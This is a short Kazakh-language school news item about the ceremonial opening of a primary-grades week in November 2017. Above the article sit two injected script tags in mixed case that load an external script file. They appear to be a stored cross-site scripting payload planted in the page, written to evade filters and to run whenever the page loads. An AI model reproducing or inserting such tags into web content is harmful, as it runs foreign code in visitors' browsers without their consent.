<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
22.11.2017
Апталықтың ашылуы!
20 қарашада біздің мектепте бастауыш сыныптар Апталығының салтанатты ашылуы өтті. Бастауыш сынып апталығы 20 қарашадан 30 қараша аралығында өтеді. Мектеп директоры Смағұлова К.Д. және тәрбие жұмысы бойынша директордың орынбасары Адилханова М.А. бастауыш сынып мұғалімдері мен оқушыларын апталықтың ашылуымен құттықтап, жақсы жетістіктерге жетулеріне тілек білдірді. Балалар білім ғалам шарына саяхат жасап, Математика, Орыс тілі, Дүниетану және Әдебиеттік оқу болып, қызықты тапсырмаларды орындады. Барлық шақырушылар көтеріңкі көңіл күй мен жақсы әсер алды. Бұл күні бірінші сынып оқушылары үшін күзгі «ПОНИ» байқауына қатысты.
Просмотров: 1203